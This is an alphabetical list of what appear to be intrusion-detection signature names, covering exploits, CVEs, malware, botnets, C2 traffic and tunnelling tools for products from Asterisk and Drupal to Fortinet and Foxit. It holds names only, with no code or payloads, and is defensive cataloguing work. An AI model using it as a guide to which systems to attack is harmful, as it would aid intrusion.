DevDojo-Voyager-Reflected-XSS-CVE-2024-55416
DEWESoft-X3-Internal-Command-Access-CVE-2018-7756
DHCP-ISC-DHCP-dhclient-script_write_params-Buffer-Overflow
Dhcpcd-Dhcpv6-Dhcp6_Findna-Buffer-Overflow
Dhcpcd-Packet-Size-Stack-Buffer-Overflow
Dhcpv6-Buffer-Overread-CVE-2023-38152
Diaenergie-SQL-Injection-CVE-2024-4548
Dialerpornpaq
DiamondFox-Botnet
Dicoogle-PACS-Web-Server-Directory-Traversal
Digiever-DS2105-Pro-Remote-Code-Execution
Digital-Watchdog-Dw-Megapix-Command-Injection-CVE-2022-34538
Digium-Asterisk-App_Minivm-Caller-Id-Command-Execution
Digium-Asterisk-Cdr-Ast_Cdr_Setuserfield-Buffer-Overflow
Digium-Asterisk-Chan_Skinny-Sccp-Packet-Denial-Of-Service
Digium-Asterisk-Compound-Rtcp-Out-Of-Bounds-Write
Digium-Asterisk-Cookie-Stack-Overflow
Digium-Asterisk-CSeq-Heap-Buffer-Overflow
Digium-Asterisk-File-Descriptor-Denial-Of-Service
Digium-Asterisk-HTTP-Management-Interface-Stack-Overflow
Digium-Asterisk-HTTP-Manager-Interface-Resource-Exhaustion
Digium-Asterisk-IAX2-Call-Number-Denial-Of-Service
Digium-Asterisk-Manager-User-Shell-Command-Execution
Digium-Asterisk-Multiple-Products-IAX2-Handshake-Denial-Of-Service
Digium-Asterisk-Non-SIP-Uris-Denial-Of-Service
Digium-Asterisk-pjsip-Channel-Driver-Register-Denial-Of-Service
Digium-Asterisk-pjsip-Contact-Header-Denial-Of-Service
Digium-Asterisk-pjsip-In-Dialog-Message-Request-Denial-of-Service
Digium-Asterisk-pjsip-Stack-ACK-Denial-Of-Service
Digium-Asterisk-pjsip_Multipart_Parse-Denial-Of-Service
Digium-Asterisk-Res_HTTP_WebSocket-HTTP-Upgrade-Request-Denial-Of-Service
Digium-Asterisk-Res_pjsip_pubsub-Out-Of-Bounds-Write
Digium-Asterisk-RTP-Stack-Information-Disclosure
Digium-Asterisk-SIP-Channel-Driver-Denial-Of-Service
Digium-Asterisk-SIP-Invalid-Response-Code-Denial-Of-Service
Digium-Asterisk-SIP-SDP-Header-Parsing-Stack-Buffer-Overflow
Digium-Asterisk-SIP-Sscanf-Denial-Of-Service
Digium-Asterisk-Skinny-Channel-Driver-Heap-Buffer-Overflow
Digium-Asterisk-Skinny-Channel-Null-Pointer-Dereference
Digium-Asterisk-Tls-Certificate-Common-Name-Null-Byte-Input-Validation-Error
Digium-Asterisk-Unnegotiated-RTP-Payload-Type-Denial-Of-Service
Digium-Asterisk-WebSocket-Frame-Empty-Payload-Denial-Of-Service
Digium-Multiple-Asterisk-Products-IAX2-Channel-Driver-Denial-of-Service
Digium-Multiple-Asterisk-Products-Skinny-Channel-Driver-Denial-of-Service
Digmine-Cryptocurrency-Miner
DirectConnect-ConnectToMe-DOS
DirectConnect-Peer-To-Peer-Network-Usage
Directory-Pro-Directory-Traversal
Directory-Traversal
Directory-Traversal-In-Archive-Filename
Disk-Pulse-Enterprise-GET-Buffer-Overflow
Disk-Pulse-Enterprise-Server-Cleint-Compnent-XML-Buffer-Overflow
Disk-Pulse-Enterprise-Server-Login-Request-Buffer-Overflow
Disk-Savvy-Enterprise-Stack-Buffer-Overflow
distcc-Remote-Shell-Execution
Distinct-TFTP-Directory-Traversal
DivX-ActiveX-Browser-Plugin-Denial-of-Service
DivX-Player-Subtitle-Parsing-Buffer-Overflow
DJ-Studio-Pro-Stack-Buffer-Overflow
Django-Get_Supported_Language_Variant-Denial-Of-Service
Django-GIS-Functions-And-Aggregates-SQL-Injection-CVE-2020-9402
Django-Multipartparser-Infinite-Loop-DoS
Django-Multipartparser.py-Parse-Denial-Of-Service
Django-Parse_accept_Lang_Header-Accept-Language-Resource-Exhaustion
Django-QuerySet-Order_By-SQL-Injection
Django-Trunc-And-Extract-SQL-Injection
Django-Urlize-Urlizetrunc-Denial-Of-Service
Django-Usernamefield-Denial-Of-Service
Django-Wordwrap-Filter-Denial-Of-Service-CVE-2025-26699
DjVu-ActiveX-Control-Buffer-Overflow
DLINK-DWL-2600-Authenticated-RCI
DLL-Loading-Remote-Code-Execution-Vulnerability-CVE-2016-0041
DLL-Planting-Remote-Code-Execution
dnaLIMS-Admin-Module-Command-Execution
dnaLIMS-Directory-Traversal
DNS-NAPTR-Potential-Remote-Code-Execution
DNS-Out-Of-State-DNS-Response-With-Additional-Record
DNS-Query-Containing-Base64-Encoded-Data
DNS-Zone-Transfer
dnscat2-DNS-Tunnel-Usage
Dnsmasq-Dhcpv6-Information-Disclosure
Dnsmasq-Dhcpv6-Stack-Buffer-Overflow
Dnsmasq-extract_Name-Out-Of-Bounds-Write
Dnsmasq-ICMP6_Packet-Heap-Buffer-Overflow
Dnsmasq-Sort_rrset-CVE-2020-25687-Out-Of-Bounds-Write
Dnsmasq-TFTP-Service-Remote-Heap-Buffer-Overflow
DoblePulsar-PeddleCheap-Implant-Traffic
Docker-Daemon-Unprotected-TCP-Socket-Exploit
Docpile-Init-Path-Parameter-Remote-File-Inclusion
Dogfood-CRM-Remote-Command-Execution
Dolibarr-16-Pre-Auth-Contact-Database-Dump
Dolibarr-ERP-And-CRM-Card.php-Reflected-Cross-Site-Scripting
Dolibarr-ERP-And-CRM-Database-Backup-Command-Injection
Dolibarr-ERP-And-CRM-Edit.php-Code-Injection
Dolibarr-ERP-And-CRM-Suite-Menu-Editor-Dol_Eval-Code-Injection
Dolibarr-ERP-And-CRM-Suite-Website-Command-Injection
Dolibarr-ERP-CRM-Command-Injection
Dolibarr-ERP-CRM-SQL-Injection
Dolibarr-ERP-Group-Stored-Cross-Site-Scripting
Donbot-Bot
Donbot-Spambot
Dopewars-Denial-of-Service
Dorkbot-Botnet
Dotcms-Cmsfilter-Assets-Access-Control-Weakness
Dotcms-RCE-Via-Arbitrary-File-Upload
DotNetNuke-Cookie-Deserialization-RCE
Double-Encoding-Usage-In-URI
DoublePulsar-Backdoor
Dovecot-And-Pigeonhole-Remote-Code-Execution
Dovecot-Rfc822_Parse_Domain-Out-Of-Bounds-Read
Dovecot-SASL-Authentication-Component-Denial-Of-Service
Dovecot-Submission-Login-And-LMTP-Infinite-Loop-DoS
Dovecot-Submission-Login-Service-Auth-DoS
Downandup-Worm-Request
Downloader-Malware
Downloader-Malware-Infection-Traffic
DrayTek-Vigor-Command-Execution-CVE-2020-15415
DrayTek-Vigor-Local-File-Inclusion-CVE-2021-20123
DrayTek-Vigor-Local-File-Inclusion-CVE-2021-20124
DrayTek-Vigor-Web-Management-Page-keyPath-Command-Injection
Dreamloader-Bot
Dries-Buytaert-Drupal-Core-Openid-Module-Information-Disclosure
Dropbox-Lan-Sync-Discovery-Protocol-Usage
Drovorub-Malware
Drupal-Coder-Module-Coder_upgrade.run.php-Remote-Code-Execution
Drupal-Core-Database-Expandarguments-SQL-Injection
Drupal-Core-File_Create_Filename-Stored-Cross-Site-Scripting
Drupal-Core-Form-Rendering-Remote-Code-Execution
Drupal-Core-Form-Rendering-Remote-Code-Execution-2
Drupal-Core-Phar-Stream-Wrapper-Insecure-Deserialization
Drupal-Core-Remote-Code-Execution-CVE-2019-6340
Drupal-Core-System.Temporary-Information-Disclosure
Drupal-Core-Web-Services-Remote-Code-Execution-CVE-2019-6340
Drupal-Core-XML-RPC-Endpoint-Internal-Entity-Expansion-Denial-Of-Service
Drupal-Core-Xml-RPC-Endpoint-Xmlrpc.php-Tags-Denial-Of-Service
Drupal-Drupalgeddon-2-Forms-API-Property-Injection
Drupal-Restws-Module-Page-Callback-Remote-Code-Execution
Dsielercha-Trojan
Dup-Scout-Enterprise-Login-Buffer-Overflow
Dynamicdesktopmedia
E-Book-Systems-FlipViewer-ActiveX-Control-Multiple-Methods-Buffer-Overflow
Easy-Chat-Server-User-Registeration-Buffer-Overflow
Easy-Chat-Server-Username-Buffer-Overflow
Easy-File-Sharing-FTP-Server-BOF
Easy-File-Sharing-HTTP-Server-POST-Buffer-Overflow
Easy-Homepage-Edit.cgi-Vulnerability
Eaton-Hmisoft-Vu3-Giffile-Stack-Buffer-Overflow
Eaton-Hmisoft-Vu3-Multiple-Vulnerabilities
Eaton-Hmisoft-Vu3-wMailBlindCopyToLen-Stack-Buffer-Overflow
Eaton-Hmisoft-Vu3-Wmailcontentlen-Stack-Buffer-Overflow
Eaton-Hmisoft-Vu3-wMessageLen-Stack-Buffer-Overflow
Eaton-Hmisoft-Vu3-Wtextlen-Stack-Buffer-Overflow
Eaton-Intelligent-Power-Management-CVE-2021-23282-Stored-Cross-Site-Scripting
Eaton-Intelligent-Power-Manager-Savedriverdata-Arbitrary-File-Deletion
Eaton-Intelligent-Power-Manager-System-Command-Injection
Eaton-IPM-Removebackground-Removefirmware-Arbitrary-File-Deletion
Eaton-Network-Shutdown-Module-Remote-Code-Execution
Eaton-Shutdown-Module-DoS
Eaton-VURemote-DoS
Ebates-Moneymaker
Ebcrypt-ActiveX-Arbitrary-File-Overwrite
Ebury-SSH-Backdoor-Activity
Ecava-IntegraXOR-DoS-CVE-2014-0753
Ecava-IntegraXOR-SCADA-Information-Leak
Echo-Request-Modem-Hangup
Eclipse-Equinoxe-OSGi-Console-Command-Execution
Eclipse-Foundation-Jetty-Web-Server-Httpparser-Remote-Information-Disclosure
Eclipse-Mosquitto-ACL-Bypass-CVE-2017-7650
Eclipse-Mosquitto-MQTT-Subscribe-Topic-Stack-Overflow
ed2k-Peer-To-Peer-Network-Usage
Edimax-IC-7100-IP-Camera-OS-Command-Injection-CVE-2025-1316
EDraw-Office-Viewer-ActiveX-Component-Unsafe-Method
EDraw-Office-Viewer-OpenWebFile-Arbitrary-Program-Execution
EDraw-PDF-Viewer-Insecure-ActiveX-Method-CVE-2009-2169
EFS-Software-Easy-File-Management-Web-Server-Userid-Buffer-Overflow
EFS-Software-Easy-File-Sharing-Web-Server-sendemail.ghp-Stack-Buffer-Overflow
EFS-Software-Easy-File-Sharing-Web-Server-Userid-Buffer-Overflow
EFS-Software-Easy-File-Sharing-Web-Server-Vfolder.ghp-Stack-Buffer-Overflow
EICAR-AntiVirus-Test-File
eIQnetworks-ESA-Buffer-Overflow
Eir-D1000-Wireless-Router-WAN-Side-Remote-Command-Injection
Ekeoil-Malware-C2-Traffic
Ektron-CMS-XSLT-Transform-Remote-Code-Execution
Elastic-ElasticSearch-Snapshot-API-Directory-Traversal
Elastic-Kibana-Server.js-Local-File-Inclusion
Elastic-Kibana-Timelion-Prototype-Pollution
ElasticSearch-Dynamic-Scripting-Code-Execution
ElasticSearch-File-Discosure
ElasticSearch-Memory-Disclosure
ElasticSearch-Search-Groovy-Sandbox-Bypass
ElasticSearch-Throwableobjectinputstream-Insecure-Deserialization
Electro-Infection-Traffic
Electron-Setasdefaultprotocolclient-Command-Injection
Electronic-Arts-Origin-Client-URI-Handler-Remote-Code-Execution
Electronic-Arts-Origin-Client-URI-Handler-Template-Injection
Electronic-Arts-SnoopyCtrl-ActiveX-Control-ControlFile-Buffer-Overflow
ElectronJS-Exodus-Wallet-Remote-Code-Execution
elFinder-PHP-Connector-Exiftran-Command-Injection
Elipse-E3-ActiveReports-ActiveX-Vulnerability
Elm-Expires-Header-Field-Buffer-Overflow
Elog-Project-Elog-Retrieve_URL-Information-Disclosure
Elog-Project-Elog-Show_Uploader_JSON-Null-Pointer-Dereference
Elog-Web-Logbook-BOF
Embedded-Object-In-HTML
Embedthis-GoAhead-Parseheaders-Out-Of-Bounds-Read
Embedthis-GoAhead-Web-Server-Cgi-Remote-Code-Execution
Embedthis-GoAhead-Web-Server-CVE-2021-42342-Cgi-RCE
Embedthis-GoAhead-Web-Server-File-Upload-Denial-Of-Service
Embedthis-GoAhead-Web-Server-File-Upload-Use-After-Free
EMC-Alphastor-3.1-Buffer-Overflow
EMC-Alphastor-Device-Manager-0x41-Command-Buffer-Overflow
EMC-Alphastor-Device-Manager-Command-Injection
EMC-Alphastor-Device-Manager-Format-String-Vulnerability
EMC-Alphastor-Library-Control-Program-Multiple-Buffer-Overflows
EMC-Autostart-Error-Logging-Stack-Buffer-Overflow
EMC-Autostart-Ftagent-Opcode-20-Multiple-Subcodes-Remote-Command-Execution
EMC-Autostart-Ftagent-Opcode-85-Subcode-33-SQL-Injection
EMC-Autostart-Ftagent.exe-Multiple-Integer-Overflow-Vulnerabilities
EMC-Autostart-Ftagent.exe-Null-Byte-Write
EMC-Captiva-PixTools-Distributed-Imaging-ActiveX-Control-File-Creation
EMC-Captiva-QuickScan-Pro-Keyhelp-ActiveX-Control-Buffer-Overflow
EMC-Cmcne-Fileuploadcontroller-Arbitrary-File-Upload
EMC-Cmcne-Fileuploadcontroller-Information-Disclosure
EMC-Cmcne-Inmservlets-Bootfileuploadmoreinfoservlet-Directory-Traversal
EMC-Cmcne-Inmservlets-CSV-Information-Disclosure
EMC-Cmcne-Inmservlets-Unifiedfileuploadmoreinfoservlet-Directory-Traversal
EMC-Cmcne-Inmservlets.war-Fileuploadcontroller-Arbitrary-File-Upload
EMC-Cmcne-Inmservlets.war-Softwarefileuploadmoreinfoservlet-Directory-Traversal
EMC-Dantz-Retrospect-Backup-Agent-Denial-Of-Service
EMC-Data-Protection-Advisor-Denial-Of-Service
EMC-Data-Protection-Advisor-Static-Credentials-Authentication-Bypass
EMC-NetWorker-Librpc.dll-Security-Check-Bypass
EMC-NetWorker-Nsrd-Format-String-Remote-Code-Execution
EMC-NetWorker-Nsrd-Stack-Buffer-Overflow
EMC-NetWorker-Nsrindexd-RPC-Service-Buffer-Overflow
EMC-NetWorker-Nsrindexd.exe-Procedure-0x01-Buffer-Overflow
EMC-Replication-Manager-Command-Execution
EMC-RepliStor-Rep_Srv-And-Ctrlservice-Denial-Of-Service
EMC-Vmax3-Vasa-Provider-Uploadconfigurator-Directory-Traversal
EMF-Windows-Graphics-Rendering-Engine-BOF
Emotet-Banking-Malware
Emotet-Download-Page
Emotet-Malware-Infection-Traffic
Enalean-Tuleap-Remote-PHP-Code-Injection-Vulnerability
Encoded-Crlf-Sequence
Encoded-JavaScript-Tag-In-PDF
Encoded-Stream-Filter-Name-In-PDF
Encrypted_Server_Name_Indicator
Endian-Firewall-Proxy-Password-Change-Command-Execution
Energizer-Duo-USB-Charger-Backdoor-Access
Enfal-Malware
Enigma2-Webinterface-Remote-Root-File-Disclosure
EnjoySAP-kwedit-ActiveX-Control-Buffer-Overflow
EnjoySAP-rfcguisink-ActiveX-Control-Buffer-Overflow
Enterasys-Network-Management-Suite-Syslog-Stack-Based-Buffer-Overflow
EnterpriseDB-Postgres-Plus-Advanced-Server-Authentication-Bypass
Enterprisedt-Completeftp-Server-Httpfile-Arbitrary-File-Deletion
Envoy-HTTP-Url-Path-Access-Control-Bypass
EQGRP-Tools
Eramba-Authenticated-Remote-Code-Execution-Module-CVE-2023-36255
Ericom-AccessNow-Server-Buffer-Overflow
Erlang-OTP-SSH-Library-Unauthenticated-Remote-Code-Execution-CVE-2025-32433
Es-File-Explorer-Open-Port
Esbot-Botnet
Esf-Pfsense-Cross-Site-Scripting
Esf-Pfsense-Multiple-Cross-Site-Scripting-Vulnerabilities
Esf-Pfsense-Snort-Snort_log_view.php-Information-Disclosure
Esf-Pfsense-Status_RRD_Graph_img.php-Command-Injection
Esf-Pfsense-Webgui-Deletefile-Directory-Traversal
Esignal-Buffer-Overflow
EsteemAudit-Exploit-Tool
Estsoft-Alzip-Mim-File-Processing-Buffer-Overflow
Etcd-API-Stored-Keys-Disclosure
EternalBlue-Probe
Ethereal-AFP-Dissector-Format-String
Ethereal-Multiple-Protocol-Dissector-Buffer-Overflows
Ethereal-Multiple-Vulnerabilities
EtterSilent-Malware-Infection-Traffic
Eudora-SMTP-Client-BOF
Eudora-Url-Handling-Buffer-Overflow
Euniverse-Perfectnav
Eureka-Email-2.2q-POP3-Buffer-Overflow
Evasion-In-SQL-Injection
Evernote-For-Mac-Embedded-Link-Directory-Traversal
EvoLogical-EvoCam-Web-Server-Buffer-Overflow
Excel-Insufficient-Record-Validation-Vulnerability-CVE-2011-1272
Excel-Memory-Corruption-CVE-2010-0823
Exchange-DoS-MS03-046
Executable-File-In-Document
Executable-File-Transfer
Executable_Disguised_As_Image_File
Exiftool-DjVu-Remote-Code-Execution
Exim-B64decode-Off-By-One
Exim-Bdat-Denial-Of-Service
Exim-Bdat-Use-After-Free
Exim-Buffer-Overflows
Exim-Deliver_Message-Command-Injection
Exim-DKIM-DNS-Decoding-Buffer-Overflow
Exim-Etrn-SQL-Injection-CVE-2025-26794
Exim-External-Authenticator-Out-Of-Bounds-Write
Exim-Filename-Header-Misparsing-CVE-2024-39929
Exim-Remote-Code-Execution-CVE-2019-15846
Exim-String-Format-Remote-Code-Execution
Exim-With-Dovecot-Lda-Sender_Address-Parameter-Remote-Command-Execution
Exorcist-C2-Traffic
Exponent-CMS-Eaascontroller-API-Function-SQL-Injection
Extremeware-Event-Log-Telnet-Failure-XSS
EyesOfNetwork-Autodiscovery-Target-Command-Execution-CVE-2020-8654
EyesOfNetwork-Hardcoded-API-Key
EyesOfNetwork-Username-SQL-Injection-CVE-2020-8656
EzSoftware-Eznet-Long-HTTP-Request-BOF
Ezula
F-Secure-AntiVirus-Library-Heap-Overflow
F-Secure-Policy-Manager-Information-Disclosure
F5-Big-IP-And-Big-IQ-iControl-iControlportal.cgi-Format-String-Vulnerability
F5-Big-IP-ASM-Stack-Based-Buffer-Overflow
F5-Big-IP-Dbquery.jsp-SQL-Injection
F5-Big-IP-iControl-Authenticated-RCE-Via-Rpm-Creator
F5-Big-IP-iControl-CSRF-File-Write-Soap-API
F5-Big-IP-Next-Central-Manager-Login-SQL-Injection-CVE-2024-26026
F5-Big-IP-Next-Central-Manager-Validateuserincm-OData-Injection
F5-Big-IP-TMM-Out-Of-Bounds-Write
F5-iControl-Rest-Unauthenticated-RCE-CVE-2021-22986
F5-iControl-Rest-Unauthenticated-RCE-CVE-2022-1388
F5-Multiple-Products-iControl-API-Hostname-Remote-Command-Execution
F5-Networks-Big-IP-iControl-Privilege-Escalation
F5-Networks-Big-IP-TMUI-Directory-Traversal-CVE-2020-5902
F5-Request-Smuggling-CVE-2023-46747
Facebook-Fizz-Early-Data-Integer-Overflow-DoS
Facebook-Photo-Uploader-ActiveX-Control-Buffer-Overflow
FakeAV-Botnet
Fakerean-Botnet
Falcon-One-Error-Page-Remote-File-Inclusion
Fallout-Exploit-Kit-Landing-Page
Famatech-Radmin-Usage
Family-Connections-CMS-Remote-Command-Execution
Fancy-Product-Designer-Unauthenticated-SQL-Injection
FANUC-OlpcPRO-Directory-Traversal
Fastify-Contenttypeparser-Denial-Of-Service
FastTrack-Peer-To-Peer-Network-Usage
Fatal-RAT-Infection-Traffic
Fatek-Automation-PLC-Winproladder-Spf-Stack-Buffer-Overflow
Fatek-Automation-PLC-Winproladder-Stack-Buffer-Overflow
Fatek-Automation-PLC-Winproladder-Tab-Stack-Buffer-Overflow
FBCIndex-Access
Felismus-Malware
FFmpeg-4xm-Processing-Memory-Corruption
FFmpeg-CBS_JPEG_Split_Fragment-Heap-Buffer-Overflow
FFmpeg-Mov_Read_Keys-Integer-Overflow
FFmpeg-OGV-File-Format-Memory-Corruption
FFmpeg-Vmd_Read_Header-Integer-Overflow
Ficker-Stealer-Infection-Traffic
File-Binary_Adobe-Acrobat-EMF-EMR_alphablend-CVE-2018-12789-Out-Of-Bounds-Read
File-Flash_Adobe-Flash-copyPixels-Integer-Overflow
File-Flash_SecureSWF-Obfuscation
File-Replication-Pro-execCommand-Command-Execution
File-Sharing-Wizard-POST-SEH-Buffer-Overflow
File-Text_Document-Template-Injection
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3873
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3874
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3875
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3885
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3893
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3914
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3916
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3917
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Invalid
File-Text_Suspicious_Inline_Iframe_Element
File-Type-Identification
FileZilla-FTP-Server-Denial-of-Service
FinalDraft-C2-Activity
Finfisher-Spyware
Finger-0-Query-User-Name-Disclosure
Finger-Bomb-DoS
Finger-Cfingerd-User-Accounts-Disclosure
Finger-Command-Execution
Finger-Dot-User-Name-Disclosure
Finger-Redirection-Information-Disclosure
Fingerprint-Test
Firebird-Database-Server-Username-Handling-Buffer-Overflow
Firebird-SQL-CNCT-Group-Number-BOF
Firebird-SQL-op-connect-request-Denial-Of-Service
Firebird-Xdr-Operation-Request-Handling-Denial-Of-Service
FireEye-Red-Team-Tools
Firefox-Browser-XUL-Frame-Tree-Validation-Vulnerability
Firefox-clipPath-SVG-Stroke-Width-Memory-Corruption
Firefox-Cookie-Site-Bondary-Bypass
Firefox-JavaScript-Engine-Memory-Corruption
Firefox-MCallGetProperty-Write-Side-Effects-Use-After-Free-Exploit
Firefox-Plugin-Finder-JavaScript-Injection
Firefox-Privileged-JavaScript-Injection
Firefox-SVG-JavaScript-Zoom-Memory-Corruption
Firefox-WYCIWYG-Cache-Manipulation
Fishbowl-Inventory-Fishbowl-Server-decodeObject-Insecure-Deserialization
Fivetoon
Flac-Project-Libflac-Picture-Metadata-Mime-Type-Size-Buffer-Overflow
Flac-Project-Libflac-Vorbis-Comment-String-Size-Buffer-Overflow
Flame-Skywiper-Malware
Flarum-Core-Cross-Site-Scripting
Flash-Embedded-Office-Document
FlashGet-FTP-Pwd-Command-Stack-Buffer-Overflow
FlexDotnetCMS-Arbitrary-Asp-File-Upload
Flexense-DiskPulse-Stack-Buffer-Overflow
Flexense-Vx-Search-Enterprise-Add_Command-Buffer-Overflow
Flexera-Flexnet-Publisher-License-Server-Buffer-Overflow
Flexera-Flexnet-Publisher-License-Server-Heap-Buffer-Overflow
Flexera-Flexnet-Publisher-License-Server-Manager-Lmgrd-Stack-BOF
Flexera-InstallShield-ISGrid2.dll-DoFindReplace-Heap-Buffer-Overflow
Flexera-Multiple-Products-Isgrid.dll-ActiveX-Control-Code-Execution
Flip4Mac-WMV-File-Parsing-Memory-Corruption
FLIR-AX8-Unauthenticated-RCE
Floodnet-IRC-Activity
Fluent-Bit-Memory-Corruption-CVE-2024-4323
Fluentd-Oj-Parser-Insecure-Deserialization-CVE-2022-39379
FoggyWeb-Backdoor-C2-Traffic
Forcepoint-SSLVPN-Password-Brute-Force
Foreign-Botnet
Foreman-Bookmarks-Creation-Remote-Code-Injection
ForgeRock-Access-Management-And-OpenAM-Jato-Insecure-Deserialization
ForgeRock-OpenAM-Jato-Java-Deserialization
Form-Pointed-To-Localhost
Formbook-Malware-Infection-Traffic
FortiGate-OS-Backdoor
FortiLogger-Arbitrary-File-Upload-Exploit
Fortinet-ForticlientEMS-SQL-Injection-CVE-2023-48788
Fortinet-Fortimanager-Fgfmsd-Missing-Authentication-Command-Injection
Fortinet-Fortinac-Arbitrary-File-Write-CVE-2022-39952
Fortinet-FortiOS-Authentication-Bypass-CVE-2024-55591
Fortinet-FortiOS-Authorization-Bypass
Fortinet-FortiOS-Format-String-CVE-2024-23113
Fortinet-FortiOS-Heap-Buffer-Overflow-CVE-2018-13383
Fortinet-FortiOS-Out-Of-Bound-Write-CVE-2024-21762
Fortinet-FortiOS-Path-Traversal-CVE-2018-13379
Fortinet-Fortisiem-Command-Injection-CVE-2023-34992
Fortinet-Fortisiem-Command-Injection-CVE-2024-23108
Fortinet-Fortiweb-Cgi_Grpc_IDL_File_Post-Command-Injection-CVE-2024-50567
Fortinet-Fortiweb-OS-Command-Injection
Fortinet-Multiple-Products-Certificate-Import-Format-String-CVE-2024-45324
Fortinet-Multiple-Products-Csfd-Directory-Traversal-CVE-2024-48884
Fortinet-Single-Sign-On-Hello-Message-Denial-Of-Service
Fortinet-Single-Sign-On-Hello-Message-Stack-Buffer-Overflow
FortiOS-And-FortiProxy-SSLVPN-Heap-Buffer-Overflow-CVE-2023-27997
FortiOS-Authentication-Bypass-CVE-2022-40684
FortiOS-Ssl-VPN-Heap-Buffer-Overflow-CVE-2022-42475
Fortra-FileCatalyst-Workflow-HSQLDB-Default-Credentials-CVE-2024-6633
Fortra-FileCatalyst-Workflow-SQL-Injection-CVE-2024-5276
Four-Faith-Routers-F3x24-F3x36-Remote-Command-Injection-CVE-2024-12856
Foxit-Multiple-Products-PNG-To-PDF-Conversion-Heap-Buffer-Overflow
Foxit-PDF-Reader-And-Editor-Annotation-CVE-2021-34850-Use-After-Free
Foxit-PDF-Reader-And-Editor-Annotation-Rect-Use-After-Free
Foxit-PDF-Reader-And-Editor-Annotation-Richdefaults-Use-After-Free
Foxit-PDF-Reader-And-Editor-Annotation-Rotate-Use-After-Free
Foxit-PDF-Reader-And-Editor-Exportxfadata-Handling-Remote-Code-Execution
Foxit-PDF-Reader-JavaScript-Xfa-User-After-Free
Foxit-Phantompdf-Acroform-Addwatermarkfromtext-Object-Use-After-Free
Foxit-Phantompdf-Text-Field-Object-Use-After-Free
Foxit-Quick-PDF-Library-CVE-2018-20247-Denial-Of-Service
Foxit-Reader-And-Editor-Annotation-CVE-2021-34833-Use-After-Free
Foxit-Reader-And-Phantompdf-Associated-File-Type-Confusion
Foxit-Reader-And-Phantompdf-Choice-Field-Use-After-Free
Foxit-Reader-And-Phantompdf-Converttopdf-CVE-2020-8844-Integer-Overflow
Foxit-Reader-And-Phantompdf-Xfa-Xdpcontent-Information-Disclosure
Foxit-Reader-And-Phantonpdf-Xfa-Gotourl-Command-Injection
Foxit-Reader-Annotation-Delay-Use-After-Free
Foxit-Reader-Annotations-Bordereffectintensity-Use-After-Free
Foxit-Reader-Annotations-NoteIcon-Use-After-Free
Foxit-Reader-Annotations-Point-Use-After-Free
Foxit-Reader-BMP-Biwidth-Heap-Based-Buffer-Overflow
Foxit-Reader-Converttopdf-BMP-Out-Of-Bounds-Read
Foxit-Reader-Gotor-Action-Stack-Buffer-Overflow
Foxit-Reader-Insecure-Library-Loading
Foxit-Reader-JavaScript-CreateTemplate-Use-After-Free
Foxit-Reader-JavaScript-getPageNumWords-Use-After-Free
Foxit-Reader-JavaScript-MailForm-Use-After-Free
Foxit-Reader-JavaScript-popUpMenu-Use-After-Free
Foxit-Reader-PDF-Parsing-Shading-Pattern-Integer-Overflow
Foxit-Reader-Phoneinfo.dll-Insecure-Library-Loading
Foxit-Reader-Plugin-For-Firefox-Url-String-Stack-Buffer-Overflow
Foxit-Studio-Photo-Psd-File-Imageresourceblocks-Out-Of-Bounds-Read
Foxit-Studio-Photo-Psd-File-Processing-Out-Of-Bounds-Read
Foxit-Studio-Photo-Psd-File-Processing-Out-Of-Bounds-Write
Foxit-Studio-Photo-TIFF-File-Processing-Integer-Overflow
Foxmail-Server-User-Command-BOF
Free-Download-Manager-Remote-Control-Authorization-Header-Buffer-Overflow
Free-Download-Manager-Torrent-File-Parsing-Multiple-Buffer-Overflows
Free-Online-PHP-Obfuscator-Code
FreeBSD-Bootpd-Stack-Buffer-Overflow
FreeBSD-Bspatch-Utility-Remote-Code-Execution
FreeBSD-NFS-Server-Nfsm_advance-Denial-Of-Service
FreeBSD-NFS-Server-Nfsrvd_readdirplus-Denial-Of-Service
FreeBSD-NFS-Server-Nfsv4-Opcode-Out-Of-Bounds-Write
FreeBSD-Nfs-Server-Readdir-Request-Memory-Corruption
FreeBSD-Nfsd-Nfs-Mount-Request-Denial-Of-Service
FreeBSD-Routed-Daemon-Routing-Information-Protocol-Assertion-Failure
FreeBSD-Rtsold-Dname_labeldec-Stack-Buffer-Overflow
FreeBSD-SCTP-ICMPv6-Denial-Of-Service
FreeBSD-TCP-Reassembly-Denial-Of-Service
Freefloat-FTP-Server-Invalid-Command-Buffer-Overflow
Freeftpd-Key-Exchange-Algorithm-String-Buffer-Overflow
Freeftpd-User-Name-Buffer-Overflow
FreePBX-Framework-Asterisk-Recording-Interface-Unserialize-Code-Execution
FreePBX-Framework-Hotelwakeup-Module-Directory-Traversal
FreePBX-Framework-Module-Config.php-Code-Execution
FreePBX-Framework-Modulefunctions-Display-SQL-Injection
FreePBX-Framework-Recordings-Module-Remote-Command-Execution
FreePBX-Recording-Interface-File-Upload-Code-Execution
FreePBX-Remote-Command-Execution
FreePBX-Remotemod-Remote-Command-Execution
FreeRADIUS-Access-Request-Denial-Of-Service
FreeRADIUS-Ascend-Send-Receive-Secret-DoS
FreeRADIUS-Client-Certificate-Verification-Stack-Buffer-Overflow
FreeRADIUS-Data2vp_Wimax-Heap-Buffer-Overflow
FreeRADIUS-FR_DHCP_attr2vp-Integer-Underflow-Out-Of-Bounds-Read
FreeRADIUS-Rad_Coalesce-Out-Of-Bounds-Read
FreeSWITCH-Event-Socket-Command-Execution
Freetype-Heap-Buffer-Overflow-CVE-2020-15999
FrontPage-Fp30reg-DLL-BOF-MS03-051
Froxlor-Log-Path-RCE
Froxlor-Simexporter.php-Import-Unrestricted-File-Upload
FTP-3Com-3CDaemon-Username-Buffer-Overflow
FTP-Ability-Server-Stor-BOF
FTP-Administrator-Login-Failure
FTP-AIX-Ftpd-BOF-Libc
FTP-Anonymous-Login-Attempt
FTP-Bin-Ls-BOF
FTP-BOF-ProFTPD-WU-FTPD
FTP-Bounce-Attack
FTP-BSD-Ftpd-Directory-Name-Buffer-Overflow
FTP-BSD-Ftpd-Glob-Buffer-Overflow
FTP-Cisco-Mkd-Buffer-Overflow
